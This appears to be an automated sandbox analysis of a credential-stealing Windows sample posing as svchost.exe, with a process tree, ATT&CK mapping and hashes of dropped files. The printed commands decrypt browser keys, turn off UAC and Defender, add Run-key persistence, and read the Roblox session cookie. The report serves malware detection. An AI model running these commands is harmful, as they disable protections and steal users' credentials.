    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,205,112,88,179,132,152,53,70,180,71,255,78,165,25,123,170,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,251,152,207,127,25,227,145,188,225,235,189,190,130,162,246,205,121,194,203,140,32,254,72,167,239,159,200,15,82,62,189,80,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,55,211,210,95,188,194,237,84,69,240,82,9,151,164,136,9,190,209,119,253,200,208,6,137,28,217,204,202,253,86,88,20,48,0,0,0,121,113,213,227,224,184,221,239,74,232,215,155,228,223,16,111,67,47,130,59,158,159,239,90,187,64,193,225,111,189,149,222,172,178,230,121,132,32,37,223,195,239,166,217,184,228,216,65,64,0,0,0,183,133,202,28,164,250,117,36,215,62,128,229,44,19,118,93,34,59,228,197,234,238,197,172,121,50,120,219,224,76,19,97,55,20,111,168,63,178,137,131,28,45,159,46,25,110,158,146,229,118,25,152,242,148,252,15,128,239,120,0,112,17,42,127), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID:3276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,205,112,88,179,132,152,53,70,180,71,255,78,165,25,123,170,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,251,152,207,127,25,227,145,188,225,235,189,190,130,162,246,205,121,194,203,140,32,254,72,167,239,159,200,15,82,62,189,80,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,55,211,210,95,188,194,237,84,69,240,82,9,151,164,136,9,190,209,119,253,200,208,6,137,28,217,204,202,253,86,88,20,48,0,0,0,121,113,213,227,224,184,221,239,74,232,215,155,228,223,16,111,67,47,130,59,158,159,239,90,187,64,193,225,111,189,149,222,172,178,230,121,132,32,37,223,195,239,166,217,184,228,216,65,64,0,0,0,183,133,202,28,164,250,117,36,215,62,128,229,44,19,118,93,34,59,228,197,234,238,197,172,121,50,120,219,224,76,19,97,55,20,111,168,63,178,137,131,28,45,159,46,25,110,158,146,229,118,25,152,242,148,252,15,128,239,120,0,112,17,42,127), $null, 'CurrentUser')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Node /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Node /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.plvUauDG7E""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.plvUauDG7E"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3304
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:3776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:4376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:4828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:4504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:3960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:4428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:3280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:4912
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:4000
- - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
    C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4656
  - - C:\Windows\Temp\{D4802F67-A54B-4555-94DE-F4FD4EC4DA8D}\.cr\python-installer.exe
      "C:\Windows\Temp\{D4802F67-A54B-4555-94DE-F4FD4EC4DA8D}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=564 -burn.filehandle.self=572 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
    3⤵
    PID:3392
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Views/modifies file attributes
    PID:4740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4620
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4624
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1748
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4312
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2244
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4208
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\svchost.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3328
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:652

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e580647.rbs

Filesize
8KB

MD5
6683b0cb62e9af4981889a97ed4996dc

SHA1
c7f1b3d2dcc182094479bf7961a406d210680a86

SHA256
8763359c88406ed2d2b0524e0c74a9b79468eb218aded5b3ae40f23016cf9000

SHA512
046655c037648564297711fb3a82ad85ee0874cc2282f9576376bb3bd95745b7da444bdb6507afd2505e06aa017d8b241142fe3c91b35ebd6a0a64bd91f357ad

Download Submit
C:\Config.Msi\e58064c.rbs

Filesize
12KB

MD5
cc5ceaffe628bed05efc31cc5c81b305

SHA1
3a61b7fc52ef2bf677e374d6d243e5ceadebc276

SHA256
76758e096887ad52d9d652bdaf00bf14f37421e31e159a9438c0d9b39e8b2ac8

SHA512
81ef1aa14999fd5c338fabce03c5e5920c554e7b0e6879780f293bc2b48a88a4497873d0f2f9017c9e6424de0f49772f3a8be808fa748a912377c1460b9e21e6

Download Submit
C:\Config.Msi\e580651.rbs

Filesize
50KB

MD5
027ffb691ff9c11cf524a24ea588d736

SHA1
8ae1ba5e7a5bf1d2255bd768ace82b612c26b663

SHA256
fd3aabc67a36e01218a036aa21eca5b52f7535a1b1b6b508ad7019a9c3c23e5f

SHA512
c48e24be333945f03ac0c2d4b3f700975a9dc0b3bec92dfab36107b8427b92d6d1c4384690b56d2e9339626eccf59721999a950db83e50b19fd621ff02632642

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a766b59cb8764029e0daa42ff2d21c3f

SHA1
9ca2e4735a93ab8ddf2d8e6928f1c570aa4ff80b

SHA256
92d5a76ed593d1450f8f5309d806ef2ec37be8839f1e0e20763e75180345feac

SHA512
e92fe19a450bc93cfcbaed70586d580470d239cd41997e0bdebdb45f1b6ba02604b4e839ab6ee40d5112ba683c647ecd10751183ab2f89226994e17680c52eae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a303fe1a2f9ff11a55d664be374b5b28

SHA1
2ffabc61eb1dcf59e49339d36e1f2f8c86b92c19

SHA256
b4a3b1f2715b929513b5c2bc4834fc77b0b2fd1416012ad522617b48cb3041b2

SHA512
1e85a53b10926f2c513a4559b74c7f701c3424ab56441b849c4095e408d4ab46b55c30e08cd07d30abac37c0e93a3d5082a6942cd665dd52607241e547c4cfe8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
9d65f62aad4b72008b0208a4d92f8a1f

SHA1
796e25e1b97497437beeda6ca686d755954a8243

SHA256
12da5220f8e9b50b304f0c9e080b7fb134442c377dadecb640dbcef024eb737f

SHA512
b2fa6eaaf3a6c758ce6011c3c1b99a7667b4d958d18aeaa0cab87c6c66181fcfbbde796a5eece00520e6bdcdc93f2711fec4644979d05da664d91926889e1424

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6344564097353c8e7e68991fffa80d88

SHA1
2ac4d108a30ec3fbd2938b0563eb912415ea7c62

SHA256
d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da

SHA512
e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6f0e62045515b66d0a0105abc22dbf19

SHA1
894d685122f3f3c9a3457df2f0b12b0e851b394c

SHA256
529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

SHA512
f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
75750301db717dee0ddce4939072ec41

SHA1
d4a763f4ced8ff5be9df24e0d6ec676a7a080527

SHA256
abfcadfc1dab687291dec5402f5472132f4d2460e85a498a37efa5ac9dc09888

SHA512
e02fbfc783aeb85a16422baf6df381b88415a89a29316695e48c1edb65745ec801759e276803207645d59b81e3ad38f584caad824772035ee6ce46c333f75ce3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8e88b76f96a92f42c998e528f1f579b

SHA1
4b4670f36f07e71e0f2f4b1a26f621c520961321

SHA256
3b40cfdd481daf73ab442892ace9a5657724ad13b7205c80eda87f84e6dd2cae

SHA512
017e2e069977fba42801446f6e99e858549e50b07bf1fa88ebce66602b88ba8101a70e0a2cfd6101e51ca6863206c4dfb770274f09bf2134b16cc8dc2fc1a6d3

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

Filesize
7.1MB

MD5
f6ddadd0d817ce569e202e57863ae919

SHA1
3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

SHA256
63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

SHA512
7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

Filesize
3.4MB

MD5
fd7e13f2c36fe528afc7a05892b34695

SHA1
14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

SHA256
2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

SHA512
7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}v3.12.6150.0\dev.msi

Filesize
384KB

MD5
dc49359c176d731fef03fc51ed13c959

SHA1
3d9348460f2300faeefe1e1e3787c55e71ff0aad

SHA256
04f38bdd910eabe114dde5e321cdcbf831c6373da9d27d791b96e09cd96f5417

SHA512
5044e4b30919e0d30502162539069014fcf2a4061f9a75a1956202231d98eba985fa7234694f70fae7d3defde2f9f41e97e821e74bda66107a9f452002768793

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

Filesize
724KB

MD5
2db9e147e0fd938c6d3c1e7cf6942496

SHA1
e4333f4334b5df6f88958e03ad18b54e64a1331f

SHA256
9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab

SHA512
4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

Filesize
1.9MB

MD5
d4c1f834f30032f220409a17e0f688cd

SHA1
61dc90b164c3797456a8ed775b353a087054fd0f

SHA256
675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

SHA512
b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ElGVZ8tBmU.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\Node.exe

Filesize
37.2MB

MD5
0596379d69afdfe2534fad7584914d1f

SHA1
34cafd2ac2fb94c4981ef903c974e0f463d0a0e8

SHA256
6ae88823ed9ebb76bd63babd61b7dfe6ac9168b2284f32f4b657ebe448b742ca

SHA512
17d8ab7db5186d3c77e5ff949bd63bd7b5a31a3891cb757340465ad1df308917c939305218b5448db9f109a61702eb054d6182eecdcba1ba2eb268a10568b932

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114204839_000_core_JustForMe.log

Filesize
3KB

MD5
8e8c4873bef970298d5240d4416fea62

SHA1
acc087d7287cfbe8b21570606fbf4afe89d8b265

SHA256
3586ca38c3914cab610775b02a71e392ad13c676ab9dbc6acf74c11afc13e3fc

SHA512
cff47b017ae92de04d0134c9247f6684c25f53dfd08ca9472177dd1d73705ae95bf216c7fa993398bcd921b836ae22ef4ccb2fd731826a0c26ae74ec67a4a053

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114204839_001_exe_JustForMe.log

Filesize
1KB

MD5
63da17486dca0d4d5804b18501ccd039

SHA1
a1f49bfb7feb52b302a12a3b7ef15bb642810cbf

SHA256
40482879dba4e7ded1daddd7c21ce56f8d5bdcc1c1f28426f4cd5a627e9952aa

SHA512
9dea94659e2445812315d50cbc9f94ed23d7d92ced5c186603db0aa1c25a24660eb2ebc1c9050813a463e5bd4eab69430c44337af30253d234b5940ba56a5b59

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250114204839_002_dev_JustForMe.log

Filesize
1KB

MD5
a684fb129971bb5c7ee4523716b344fa

SHA1
27e8ef43ab858c6f4fa712c139199d6609bc94ad

SHA256
133d3eabd45baa2c8356356acf09f70c31adb7122af9cbaf758607ac47270e10

SHA512
93227041f9aea4a5b2d3fb184fda863b2484eca84c3e4e1ed7923f27e1f5c9fa2238a5c919b1171ffce3d30a58ea7bcb2d4bf2b4bdd3fb7f379fd9b79cddb4ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp

Filesize
1KB

MD5
060a1e18734b8df4365e5427cb1d3003

SHA1
b5cdabfb5d97231890ca8ea098dbfbfcaa20a8c8

SHA256
a400948810f5977c0617cf6cfa9895f0bfc4ab459fffc12cc46976cf68d4b990

SHA512
f64fecf3064ba3c37c286632f0e88540668fcf791d2f353ef192cd7cec4ecec3096f3b56d7dec65f22e0905738a0ead0b9cd86f59e54dc98711bc1f93f1bdb5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TestingServer.exe

Filesize
3.7MB

MD5
54980c00c99dd31da947a704034250e4

SHA1
0388dcb527b4df85048593fb1fe324461ac2539b

SHA256
efe6e5da039480336cc51d61970eb7ca5b0c10bc315c083f3cd08f81fb5fa7e6

SHA512
3e2202658a8a44d994a34dfa5ae2b7de4d539713424f6e9047401847e003df6daf06848c405584e2c0ac7f80c421d708caf0b82f6995e720060a2662c18fd20c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_szvrrcef.dn1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ad1c82d64ed3c147af1eb0485a3f8dafhlbQwF\BackupExpand.xlsx

Filesize
1.5MB

MD5
903ac20d5ad3b0029feaeed1d7240190

SHA1
dba76dfc134045749fb696b3369afd2c688382b2

SHA256
66d147ebecea15e6eb43b419cc279dfff261d136af5d6641c23170989508dbac

SHA512
509ca0da7c6477ce945c3f675d91a9c22b0a2f7a868c44b814bc18d3372d8b31ceaa3114852a7b3e0095d74c011f2abc6a4304261968525eb518cb9e345d707f

Download Submit
C:\Users\Admin\AppData\Local\Temp\c1nywozl\c1nywozl.dll

Filesize
3KB

MD5
746f3fc9b0234b2238db4cc9745e149f

SHA1
bc2f0a6c47f4c77b0aefbba64326ead0b8d279f8

SHA256
eb6958a23c1cf0ab990edb34cd264cf05b00ee5a59f54c864e031bc02d089871

SHA512
86fa37f19bc4375b9edab6a318583e1b9d6b3ee85c4ab81b357754150b96ba16238597bd30504160913043c0e19edb37491e75f33f0c797097224a971adeaa29

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\python-installer.exe

Filesize
25.3MB

MD5
d8548aa7609a762ba66f62eeb2ca862d

SHA1
2eb85b73cab52693d3a27446b7de1c300cc05655

SHA256
5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

SHA512
37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
229KB

MD5
74a87327b20292e3a514a2edd1f91c2c

SHA1
d4a38972946d2a8ce32d375b4781e2f09ecc5368

SHA256
7d3e8efdb9cc50120a910f17ed69a6edafd03a6d8ef2765f07e974bab5d6c7a2

SHA512
effa857d12d0d955504013525aab1f75bd0e48e958e82b4822ecaab3333176b80c4a107934a11525b791f77f4126cc5db863f841c6cb6c3db3ea679514cb4eec

Download Submit
C:\Windows\Temp\{C5D01B85-B315-408C-BA2E-7B63FFD708AF}\.ba\PythonBA.dll

Filesize
675KB

MD5
8c8e5a5ca0483abdc6ad6ef22c73b5d2

SHA1
9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

SHA256
edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

SHA512
861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

Download Submit
C:\Windows\Temp\{C5D01B85-B315-408C-BA2E-7B63FFD708AF}\.ba\SideBar.png

Filesize
50KB

MD5
888eb713a0095756252058c9727e088a

SHA1
c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

SHA256
79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

SHA512
